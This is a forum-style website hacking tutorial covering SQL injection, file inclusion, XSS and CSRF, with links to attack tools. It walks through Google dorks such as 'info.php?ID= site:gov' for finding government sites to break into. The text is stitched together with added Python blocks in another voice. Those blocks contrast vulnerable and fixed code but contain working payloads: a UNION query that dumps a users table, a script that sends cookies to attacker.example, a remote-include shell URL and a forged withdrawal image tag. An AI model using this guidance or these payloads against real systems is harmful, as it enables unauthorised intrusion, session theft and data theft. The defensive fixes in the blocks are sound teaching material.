
Hello, I'm Injection. I've been in the website hacking scene for a while.

The best part of it: you could get into a good college, or even a job, as a pen tester / white hat. If you use your skills for black-hat methods you could end up in the same place, but most likely the feds will be after you if you try something big. This tutorial will teach you everything from the basics to the extreme.

Where do I get started? Well, when I started hacking websites I learned the art of SQL. You have to learn it manually first. Most people laugh at you when you ask for help, so here are some great tutorials explaining it:

SQL Injection Tutorial by PhortyPhour (very detailed and basic)
Full SQL Injection Tutorial by Sketch
SQL Injection Tutorial by kr4z1

Have you gone over and got the basics of SQL? If so, great! We are going to move on to how to hack websites 10x faster than manually. SQL injection tools are very popular and actually don't always work. If you found a big site you want to hack, then do it manually. Otherwise, if you want it hacked quickly, you're probably bound to use a tool.

Here are some SQL injection tools and my personal opinion on them. (Click on the name for the direct download.)

Havij 1.14: This is the most commonly used SQL tool and many users use it. I believe it has a high success rate, but on other errors it's not too successful.
SQL Poizon v1.1: I find this tool very useful for dork finding, but I haven't used the SQL builder part yet. The thread is located here.

Those are the tools I use whenever I use a tool; however, they are not always successful.

Finding Hackable Sites

Well, Google is cracking down on tools that crawl the dorks. Dorks are your best friend. You have so many capabilities with them and can hack any type of site! 7,000 dorks are located here.

For example, I want to go to jail. Let's hack some governments? Okay, I'm going to use the dork
Code:
info.php?ID=
because usually a government would use that on its site. Let's restrict the site type. Usage:
Code:
info.php?ID= site:gov
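Before going on to what that dork returns, here is what the injection itself looks like in code. This is an added example written in Python against an in-memory SQLite database; it is not from the original post and does not model any particular site. The news and users tables, their rows and the password hash are constructed for the demonstration. It runs the same four ID= values through a page that concatenates the value into the query (the bug) and one that binds it as a parameter (the fix), and records either the rows or the database error, which is exactly what the manual single-quote test described later in this section looks for.

```python
import sqlite3

# Constructed sample database, not from the original post: a news table a
# page like info.php?ID= would read, and a users table an attacker is after.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO news VALUES (1, 'Welcome', 'First post');
        INSERT INTO news VALUES (2, 'Notice', 'Second post');
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def get_news_vulnerable(conn, id_param):
    """The bug: the ID= value is pasted straight into the SQL text."""
    sql = "SELECT id, title, body FROM news WHERE id = " + id_param
    return conn.execute(sql).fetchall()


def get_news_safe(conn, id_param):
    """The fix: the value is bound as a parameter and never parsed as SQL."""
    sql = "SELECT id, title, body FROM news WHERE id = ?"
    return conn.execute(sql, (id_param,)).fetchall()


def probe(fetch, conn, id_param):
    """Run one lookup and report either the rows or the database error.
    A database error on a stray quote is what the manual test looks for."""
    try:
        return {"rows": fetch(conn, id_param), "error": None}
    except sqlite3.DatabaseError as exc:
        return {"rows": None, "error": str(exc)}


# The values an attacker would put after ID= in the URL.
PAYLOADS = {
    "normal": "1",
    "quote": "1'",                    # manual test: a stray quote breaks the SQL
    "tautology": "1 OR 1=1",          # WHERE clause is always true: every row comes back
    "union": "1 UNION SELECT id, username, password FROM users",  # read another table
}


def run_all():
    """Return {payload name: {"vulnerable": probe result, "safe": probe result}}."""
    conn = make_db()
    return {
        name: {
            "vulnerable": probe(get_news_vulnerable, conn, payload),
            "safe": probe(get_news_safe, conn, payload),
        }
        for name, payload in PAYLOADS.items()
    }


if __name__ == "__main__":
    for name, result in run_all().items():
        print(name)
        print("  vulnerable:", result["vulnerable"])
        print("  safe:      ", result["safe"])
```

With the bound parameter, the quote, the tautology and the UNION are all just text that no integer id equals, so the safe page returns no rows and no error for all three; the concatenating page errors on the quote, returns every row on the tautology and leaks the users table on the UNION. That error-versus-no-error difference is what tools like Havij automate.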

With that dork I would get government results, and then just test whether a page is vulnerable by adding a ' before or after the number. :)

Other country codes:
AD (Andorra) AE (UAE) AF (Afghanistan) AG (Antigua and Barbuda) AI (Anguilla) AL (Albania) AM (Armenia) AN (Netherlands Antilles) AO (Angola) AQ (Antarctica) AR (Argentina) ARPA (Arpanet) AS (American Samoa) AT (Austria) AU (Australia) AW (Aruba) AZ (Azerbaijan) BA (Bosnia and Herzegovina) BB (Barbados) BD (Bangladesh) BE (Belgium) BF (Burkina Faso) BG (Bulgaria) BH (Bahrain) BI (Burundi) BJ (Benin) BM (Bermuda) BN (Brunei Darussalam) BO (Bolivia) BR (Brazil) BS (Bahamas) BT (Bhutan) BV (Bouvet Island) BW (Botswana) BY (Belarus) BZ (Belize) CA (Canada) CC (Cocos Islands) CF (Central African Republic) CG (Congo) CH (Switzerland) CI (Cote d'Ivoire)

CK (Cook Islands) CL (Chile) CM (Cameroon) CN (China) CO (Colombia) COM (US Commercial) CR (Costa Rica) CS (Czechoslovakia) CU (Cuba) CV (Cape Verde) CX (Christmas Island) CY (Cyprus) CZ (Czech Republic) DE (Germany) DJ (Djibouti) DK (Denmark) DM (Dominica) DO (Dominican Republic) DZ (Algeria) EC (Ecuador) EDU (US Educational) EE (Estonia) EG (Egypt) EH (Western Sahara) ER (Eritrea) ES (Spain) ET (Ethiopia) FI (Finland) FJ (Fiji) FK (Falkland) FM (Micronesia) FO (Faroe Islands) FR (France) FX (France) GA (Gabon) GB (Great Britain) GD (Grenada) GE (Georgia) GF (French Guiana) GH (Ghana) GI (Gibraltar) GL (Greenland (Island)) GM (Gambia) GN (Guinea) GOV (Government) GP (Guadeloupe) GQ (Equatorial Guinea)

GR (Greece) GS (S.Georgia and S.Sandwich Isls.) GT (Guatemala) GU (Guam) GW (Guinea-Bissau) GY (Guyana) HK (Hong Kong) HM (Heard and McDonald Islands) HN (Honduras) HR (Croatia) HT (Haiti) HU (Hungary) ID (Indonesia) IE (Ireland) IL (Israel) IN (India) INT (International) IO (British Indian Ocean Territory) IQ (Iraq) IR (Iran) IS (Iceland) IT (Italy) JM (Jamaica) JO (Jordan) JP (Japan) KE (Kenya) KG (Kyrgyzstan) KH (Cambodia) KI (Kiribati) KM (Comoros) KN (Saint Kitts and Nevis) KP (Korea (North)) KR (Korea (South)) KW (Kuwait) KY (Cayman Islands) KZ (Kazakhstan) LA (Laos) LB (Lebanon) LC (Saint Lucia) LI (Liechtenstein) LK (Sri Lanka) LR (Liberia) LS (Lesotho) LT (Lithuania) LU (Luxembourg) LV (Latvia) LY (Libya)

MA (Morocco) MC (Monaco) MD (Moldova) MG (Madagascar) MH (Marshall Islands) MIL (Military) MK (Macedonia) ML (Mali) MM (Myanmar) MN (Mongolia) MO (Macau) MP (Northern Mariana Islands) MQ (Martinique) MR (Mauritania) MS (Montserrat) MT (Malta) MU (Mauritius) MV (Maldives) MW (Malawi) MX (Mexico) MY (Malaysia) MZ (Mozambique) NA (Namibia) NASA (NASA) NATO (NATO) NC (New Caledonia) NE (Niger) NET (Network) NF (Norfolk Island) NG (Nigeria) NI (Nicaragua) NL (Netherlands) NO (Norway) NP (Nepal) NR (Nauru) NT (Neutral Zone) NU (Niue) NZ (New Zealand) OM (Oman) ORG (Organization) PA (Panama) PE (Peru) PF (French Polynesia) PG (Papua New Guinea) PH (Philippines) PK (Pakistan) PL (Poland)

PM (St. Pierre and Miquelon) PN (Pitcairn) PR (Puerto Rico) PT (Portugal) PW (Palau) PY (Paraguay) QA (Qatar) RE (Reunion) RO (Romania) RU (Russian Federation) RW (Rwanda) SA (Saudi Arabia) SB (Solomon Islands) SC (Seychelles) SD (Sudan) SE (Sweden) SG (Singapore) SH (St. Helena) SI (Slovenia) SJ (Svalbard and Jan Mayen Islands) SK (Slovak Republic) SL (Sierra Leone) SM (San Marino) SN (Senegal) SO (Somalia) SR (Suriname) ST (Sao Tome and Principe) SU (USSR) SV (El Salvador) SY (Syria) SZ (Swaziland) TC (Turks and Caicos Islands) TD (Chad) TF (French Southern Territories) TG (Togo) TH (Thailand) TJ (Tajikistan) TK (Tokelau) TM (Turkmenistan) TN (Tunisia) TO (Tonga) TP (East Timor) TR (Turkey) TT (Trinidad and Tobago) TV (Tuvalu) TW (Taiwan) TZ (Tanzania)

UA (Ukraine) UG (Uganda) UK (United Kingdom) UM (US Minor Outlying Islands) US (United States (USA)) UY (Uruguay) UZ (Uzbekistan) VA (Vatican City State (Holy See)) VC (Saint Vincent and the Grenadines) VE (Venezuela) VG (Virgin Islands (British)) VI (Virgin Islands (USA)) VN (Viet Nam) VU (Vanuatu) WF (Wallis and Futuna Islands) WS (Samoa) YE (Yemen) YT (Mayotte) YU (Yugoslavia) ZA (South Africa) ZM (Zambia) ZR (Zaire) ZW (Zimbabwe)

Remote File Inclusion Tutorial

I've only found one good tutorial, and it's very useful. RFI means Remote File Inclusion. RFI is a type of web application security hole. On the net there are so many sites which are vulnerable to RFI. In this tutorial I am going to show you RFI with PHP. PHP is a web scripting engine; it's the most widely used one, so that's why I am using it in this tutorial. Learn more about PHP: http://php.net | http://en.wikipedia.org/wiki/PHP

To understand what file inclusion is, I am going to show a little example. This is an example site in PHP:
Code:

This is a very basic page. But as your page expands you might want to put the individual pages in their own files and include them in the main file depending on user input. This way, when you've got pages with perhaps 10k lines of PHP code, you don't have to spend hours looking

for the bit of code you want to edit/view. By user input I mean things like a URL GET argument. A GET argument could look like this:
Code:
www.site.com/index.php?page=index
In the above example the PHP script would see page=index and then show the content of index. The index can be anything: a file, an SQL value, a hard-coded variable. If it is a file, then the PHP script is most likely using the include() function, and that is file inclusion. That's just a little part. Useful tutorials:

Easy RFI Tutorial by Sketch
Shell via LFI through the /proc/self/environ method

I'm going to wrap up this RFI part. Hope this part has helped you!

Local File Inclusion

LFI stands for Local File Inclusion. LFI is very easy and very popular because of the number of scanners it has. I personally don't do LFI too often, but when I'm bored I'll do it a couple of times. This is a must to learn if you're planning to become a good website hacker.

Good tutorials:
XCode LFI Scanner by Poni
Perl LFI Scanner

LFI scanners: There are so many scanners these days, so here are a few scanners that you could use. There are many scanners and each one of them might be the same. I personally love Poni's tools; they are very useful and actually work perfectly. It actually is good and I've used it. Well, that's LFI. Hope you benefited from that and enjoyed learning it. Now onto the next concept.

Cross Site Scripting

Well, this seems to be the hardest to learn for some people. I myself took a long time to fully understand the entire concept. As of right now I still need knowledge on this, but who doesn't ;) XSS means Cross Site Scripting. Yes, the X is the two crossing lines; a lot of

people don't understand that at first. On to the main complexity of XSS.

XSS has two types: persistent and non-persistent.

Non-persistent (reflected): Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and stores sensitive data, such as billing information. Mallory observes that Bob's website contains a reflected XSS vulnerability. Mallory crafts a URL to exploit the vulnerability and sends Alice an email, enticing her to click on the link under false pretenses. This URL points to Bob's website but contains Mallory's malicious code, which the website will reflect. Alice visits the URL provided by Mallory while logged into Bob's website. The malicious script embedded in the URL executes in Alice's browser as if it came directly from Bob's server (this is the actual XSS vulnerability). The script can be used to send Alice's session cookie to Mallory. Mallory can then use the session cookie to steal sensitive information available to Alice (authentication credentials, billing info, etc.) without Alice's knowledge.

Persistent (stored) attack: Mallory posts a message with a malicious payload to a social network. When Bob reads the message, Mallory's XSS steals Bob's cookie. Mallory can now hijack Bob's session and impersonate Bob.

Framework: a browser exploitation framework could be used to attack the website and the user's local environment.

XSS is basically using JavaScript in different forms to get at the details of a user's profile on a big website. With the help of XSS we can steal the cookies of the owner of the website. XSS is a very large concept, and your success rate depends on your imagination and experience. SQL injection and keylogging are things where you follow certain steps to execute something, whereas XSS is about understanding the ways we can use JavaScript, and the places on a website where our JavaScript can be made to execute may differ from site to site.
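The reflected case above, as an added example that is not part of the original post: a search page in Python that reflects q= unescaped, the same page with html.escape() applied, the kind of cookie-stealing payload the text describes, and the crafted link Mallory would send Alice. bob.example, attacker.example and the PHPSESSID cookie name are assumed; the Set-Cookie line at the end shows the HttpOnly flag that keeps document.cookie from reading the session cookie in the first place, which is the cheapest mitigation for the cookie-theft step.

```python
import html
from urllib.parse import parse_qs, urlencode, urlsplit

SESSION_COOKIE = "PHPSESSID"   # assumed cookie name


def search_page_vulnerable(query):
    """Reflects q= straight into the page, as the vulnerable site does."""
    return "<p>Results for: " + query + "</p>"


def search_page_safe(query):
    """Same page, but the value is HTML-escaped before it is reflected."""
    return "<p>Results for: " + html.escape(query, quote=True) + "</p>"


def query_from_url(url):
    """Pull q= out of a link, as the server would when Alice clicks it."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def contains_script(page):
    """Crude check: did the reflected value become a real <script> element?"""
    return "<script>" in page.lower()


def session_cookie_header(value):
    """The Set-Cookie line that keeps document.cookie from reading the session:
    HttpOnly hides it from script, Secure keeps it off plain HTTP."""
    return "Set-Cookie: %s=%s; HttpOnly; Secure; SameSite=Lax; Path=/" % (SESSION_COOKIE, value)


# Constructed payload: ships document.cookie to an assumed attacker host.
PAYLOAD = '<script>new Image().src="http://attacker.example/c?"+document.cookie</script>'
# The link Mallory mails to Alice: Bob's site, with the payload URL-encoded in q=.
CRAFTED_LINK = "http://bob.example/search?" + urlencode({"q": PAYLOAD})


def demo():
    """Serve the crafted link through both versions of the page."""
    q = query_from_url(CRAFTED_LINK)
    return {
        "reflected_value": q,
        "vulnerable": search_page_vulnerable(q),
        "safe": search_page_safe(q),
    }


if __name__ == "__main__":
    print(CRAFTED_LINK)
    for key, value in demo().items():
        print(key, "->", value)
    print(session_cookie_header("abc123"))
```

The escaped page still shows Alice exactly what she searched for; it just arrives as text (&lt;script&gt;) rather than markup. Escaping has to match the context the value lands in (an attribute or a script block needs different treatment than body text), which is why XSS is harder to stamp out than the single fix here suggests.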
XSS takes a while to get used to, so don't feel lame or out of place. Useful Cross Site Scripting tutorials:

XSS is a very fun vulnerability because so many websites are vulnerable to it!
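Going back to the RFI and LFI sections above: the page=index lookup and what goes wrong when the value goes straight into include(). This is an added example in Python, not the post's PHP, and the directory tree (a pages/ folder holding index.php, with a config.php containing a made-up password one level above it) is constructed in a temporary directory. The allowlist of page names and the attacker.example URL are assumptions. The vulnerable resolver accepts a relative path (LFI: ../config reaches outside pages/) and a URL (RFI: PHP with allow_url_include on would fetch and run it); the hardened one allowlists the page name and then checks that the resolved real path still sits under pages/.

```python
import os
import tempfile

# Assumed allowlist of page names the site actually has; not from the post.
ALLOWED_PAGES = {"index", "about", "contact"}


def resolve_vulnerable(pages_dir, page):
    """What index.php?page= becomes when the value goes straight into include():
    a URL is accepted as-is (RFI) and a relative path is joined unchecked (LFI)."""
    if page.startswith(("http://", "https://", "ftp://")):
        return page                                  # remote include: fetched from the attacker
    return os.path.join(pages_dir, page + ".php")    # local include: ../ walks out of pages/


def resolve_safe(pages_dir, page):
    """Hardened lookup: the name must be on the allowlist, and the resolved real
    path must still sit under pages_dir (guards against symlinks and ../)."""
    if page not in ALLOWED_PAGES:
        raise ValueError("unknown page: %r" % page)
    base = os.path.realpath(pages_dir)
    target = os.path.realpath(os.path.join(base, page + ".php"))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes pages directory")
    return target


def escapes(pages_dir, path):
    """True if a local path resolves to somewhere outside pages_dir."""
    base = os.path.realpath(pages_dir)
    return os.path.commonpath([base, os.path.realpath(path)]) != base


def demo():
    """Build a constructed tree in a temp dir and try three page= values."""
    root = tempfile.mkdtemp()
    pages = os.path.join(root, "pages")
    os.makedirs(pages)
    with open(os.path.join(pages, "index.php"), "w") as f:
        f.write("<h1>index</h1>")
    with open(os.path.join(root, "config.php"), "w") as f:   # made-up secret outside pages/
        f.write("<?php $db_pass = 'hunter2'; ?>")

    inputs = {
        "normal": "index",
        "lfi": "../config",                            # ../config.php, one level above pages/
        "rfi": "http://attacker.example/shell.txt",    # assumed hostile URL
    }
    out = {}
    for name, value in inputs.items():
        vuln = resolve_vulnerable(pages, value)
        is_url = vuln.startswith(("http://", "https://", "ftp://"))
        try:
            safe = resolve_safe(pages, value)
        except ValueError as exc:
            safe = "rejected: " + str(exc)
        out[name] = {
            "vulnerable": vuln,
            "vulnerable_is_remote": is_url,
            "vulnerable_reads_outside": (not is_url) and escapes(pages, vuln),
            "vulnerable_readable": (not is_url) and os.path.isfile(vuln),
            "safe": safe,
        }
    return out


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The allowlist alone already stops both inputs here; the realpath check is there for the day someone adds a page name that is itself a symlink, or switches the allowlist to a pattern match. The /proc/self/environ trick from the linked tutorial is just the LFI branch with a different target file, which is why the fix is the same.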

Cross Site Request Forgery (CSRF)

CSRF means Cross Site Request Forgery. This is a very dangerous attack, one that is commonly sent by e-mail or other means and often tricks a user. Links given to a target may include HTML, something like this:
Code:
<img src="http://site.example/withdraw?account=bob&amount=1&for=mallory" height="1" width="1" border="0">
When the victim's browser loads this image it sends the request to site.example together with the victim's cookies for that site, so the site will think it was a valid and intentional move. More on this can be found here; I'm not going to explain this one too much, though. So I hope you learned something.

Web Application Attack Techniques

This list below fits in the category Parameter manipulation:
Arbitrary File Deletion
Code Execution
Cookie Manipulation (meta http-equiv & CRLF injection)
CRLF Injection (HTTP response splitting)
Cross Frame Scripting (XFS)
Cross-Site Scripting (XSS)
Directory traversal
Email Injection
File inclusion
Full path disclosure
LDAP Injection
PHP code injection
PHP curl_exec() URL is controlled by user
PHP invalid data type error message
PHP preg_replace used on user input
PHP unserialize() used on user input
Remote XSL inclusion
Script source code disclosure
Server-Side Includes (SSI) Injection
SQL injection
URL redirection
XPath Injection vulnerability
EXIF

This list below fits in the category MultiRequest parameter manipulation:
Blind SQL injection (timing)

Blind SQL/XPath injection (many types)

This list below fits in the category File checks:
8.3 DOS filename source code disclosure
Search for backup files
Cross Site Scripting in URI
PHP super-globals overwrite
Script errors (such as the Microsoft IIS Cookie Variable Information Disclosure)

This list below fits in the category Directory checks:
Cross Site Scripting in path
Cross Site Scripting in Referer
Directory permissions (mostly for IIS)
HTTP Verb Tampering (HTTP Verb POST & HTTP Verb WVS)
Possible sensitive files
Session fixation (jsessionid & PHPSESSID session fixation)
Vulnerabilities (e.g. Apache Tomcat Directory Traversal, ASP.NET error message etc.)
WebDAV (very vulnerable component of IIS servers)

This list below fits in the category Text Search Disclosure:
Application error message
Check for common files
Directory listing
Email address found
Local path disclosure
Possible sensitive files
Microsoft Office possible sensitive information
Possible internal IP address disclosure
Possible server path disclosure (Unix and Windows)
Possible username or password disclosure
Sensitive data not encrypted
Source code disclosure
Trojan shell (r57, c99, crystal shell etc.) (if any)
WordPress database credentials disclosure

This list below fits in the category File Uploads:
Unrestricted File Upload

This list below fits in the category Authentication:
Microsoft IIS WebDAV Authentication Bypass
SQL injection in the authentication header
Weak password
GHDB - Google Hacking Database (using dorks to find what Google crawlers have found, like passwords etc.)

This list below fits in the category Web Services - Parameter manipulation & with multirequest:
Application error message (testing with empty, NULL, negative, big hex etc.)
Code Execution
SQL Injection
XPath Injection
Blind SQL/XPath injection (test for numeric, string, number inputs etc.)
Stored Cross-Site Scripting (XSS)
Cross-Site Request Forgery (CSRF)

I really hope this has helped you, and if you ever have any problems with anything from above, please post what you are having trouble with and people will help you out and solve your problem. Thank you for reading. This has taken me several hours to complete.
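Returning to the CSRF section above, as an added example that is not from the original post: a withdraw handler in Python that does what the <img> trick relies on (it accepts any request that arrives with the session cookie) next to one that rejects it three ways: state changes only over POST, the Origin (or Referer) header must be the site itself, and the form must carry a token tied to the session. site.example is the host from the post's own <img> line; mallory.example, the session object and the request headers are constructed for the demonstration.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

SITE_ORIGIN = "http://site.example"      # the site from the <img> example above


class Session:
    """Constructed server-side session: the logged-in user and a per-session
    CSRF token that the site's own forms embed as a hidden field."""
    def __init__(self, user):
        self.user = user
        self.csrf_token = secrets.token_hex(16)


def handle_withdraw_vulnerable(session, method, url, headers):
    """Accepts anything that arrives with the session cookie, including the GET
    a hidden <img> fires from another site. This is what the attack relies on."""
    params = parse_qs(urlsplit(url).query)
    return {"ok": True, "debit": params["account"][0],
            "amount": int(params["amount"][0]), "to": params["for"][0]}


def handle_withdraw_safe(session, method, url, headers, form):
    """Rejects the forged request three ways: state changes must be POST, the
    Origin (or Referer) must be this site, and the form must carry the token
    bound to this session."""
    if method != "POST":
        return {"ok": False, "reason": "state change over GET"}
    origin = headers.get("Origin") or headers.get("Referer", "")
    if origin != SITE_ORIGIN and not origin.startswith(SITE_ORIGIN + "/"):
        return {"ok": False, "reason": "cross-site origin"}
    if not hmac.compare_digest(form.get("csrf_token", ""), session.csrf_token):
        return {"ok": False, "reason": "bad csrf token"}
    return {"ok": True, "debit": form["account"],
            "amount": int(form["amount"]), "to": form["for"]}


# The request the <img> tag from the post makes: GET, no body, Referer is the
# attacker's page, and the browser attaches Bob's cookie on its own.
FORGED_URL = "http://site.example/withdraw?account=bob&amount=1&for=mallory"
FORGED_HEADERS = {"Referer": "http://mallory.example/cat.html"}   # assumed attacker page


def demo():
    session = Session("bob")
    withdraw = SITE_ORIGIN + "/withdraw"
    forged_form = {"account": "bob", "amount": "1", "for": "mallory"}   # no token
    legit_form = {"account": "bob", "amount": "1", "for": "alice",
                  "csrf_token": session.csrf_token}
    return {
        # vulnerable handler: the <img> GET goes through
        "img_vulnerable": handle_withdraw_vulnerable(session, "GET", FORGED_URL, FORGED_HEADERS),
        # hardened handler: the same GET is refused before anything else is checked
        "img_safe": handle_withdraw_safe(session, "GET", FORGED_URL, FORGED_HEADERS, {}),
        # attacker upgrades to a hidden auto-submitting POST form: Origin gives it away
        "form_safe": handle_withdraw_safe(session, "POST", withdraw,
                                          {"Origin": "http://mallory.example"}, forged_form),
        # even if the origin check were fooled, the attacker cannot know the token
        "token_safe": handle_withdraw_safe(session, "POST", withdraw,
                                           {"Origin": SITE_ORIGIN}, forged_form),
        # Bob's own form submission
        "legit_safe": handle_withdraw_safe(session, "POST", withdraw,
                                           {"Origin": SITE_ORIGIN}, legit_form),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The token comparison uses hmac.compare_digest rather than == so the check does not leak timing. Note what the attacker does and does not have: the browser sends the cookie for them, but it never exposes the token embedded in the site's own page to a page on mallory.example, which is exactly why a per-session token defeats the forged request while the cookie alone does not.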
